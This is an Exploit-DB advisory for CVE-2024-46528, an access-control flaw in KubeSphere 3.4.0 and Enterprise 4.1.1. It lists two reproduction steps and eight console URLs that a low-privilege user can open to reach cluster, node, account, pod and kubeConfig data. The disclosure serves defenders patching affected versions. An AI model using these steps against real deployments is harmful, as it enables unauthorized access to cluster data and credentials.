KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

EDB-ID:

52097




Platform:

Multiple

Date:

2025-03-27


# Exploit Title: IDOR Vulnerability in KubeSphere v3.4.0 & KubeSphere Enterprise v4.1.1
# Date: 3 September
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://kubesphere.io
# Software Link: https://github.com/kubesphere/kubesphere
# Version: [>= 4.0.0 & < 4.1.3] , [>= 3.0.0 & < 3.4.1]
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-46528

1-) Log in to the system with a user who is not registered to any workspace (e.g., a "platform-regular" user who has limited authorization).

Note: The authorization level of this user is as follows:
"Cannot access any resources before joining a workspace."

2-) After logging in with this user, it has been observed that cluster information, node information, users registered in the system, and other similar areas can be accessed without the user being registered to any workspace or cluster.

Examples of accessible endpoints:

http://xxx.xxx.xx.xx:30880/clusters/default/overview 
http://xxx.xxx.xx.xx:30880/clusters/default/nodes 
http://xxx.xxx.xx.xx:30880/access/accounts 
http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/ranking 
http://xxx.xxx.xx.xx:3 0880/clusters/default/monitor-cluster/resource 
http://xxx.xxx.xx.xx:30880/clusters/default/projects 
http://xxx.xxx.xx.xx:30880/clusters/default/nodes/minikube/pods 
http://xxx.xxx.xx.xx:30880/clusters/default/kubeConfig